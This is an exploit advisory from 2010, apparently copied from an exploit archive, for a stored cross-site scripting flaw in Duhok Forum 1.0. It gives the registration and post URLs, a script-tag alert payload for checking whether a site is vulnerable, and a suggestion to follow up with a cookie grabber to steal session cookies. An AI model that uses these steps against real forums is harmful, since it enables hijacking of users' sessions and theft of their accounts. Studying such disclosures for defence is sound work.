Home / os / winme

Duhok Forum 1.0 script Cross Site Scripting Vulnerability

Posted on 15 March 2010

========================================================= Duhok Forum 1.0 script Cross Site Scripting Vulnerability ========================================================= ======================================================================================== | # Title : Duhok Forum 1.0 script Cross Site Scripting Vulnerability | # Author : indoushka | # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu) | # Bug : XSS ====================== Exploit By indoushka ================================= # Exploit : 1 - http://127.0.0.1/st/index.php?mode=register&Approval=1 (1 register in to the web site) 2 - http://127.0.0.1/st/index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post ) Put this code 4 virified is infected or not <ScRiPt>alert(213771818860)</ScRiPt> a test post 3- if it infected post a new post and use cookie Graber # ~ - [ [ : Inj3ct0r : ] ]

 

TOP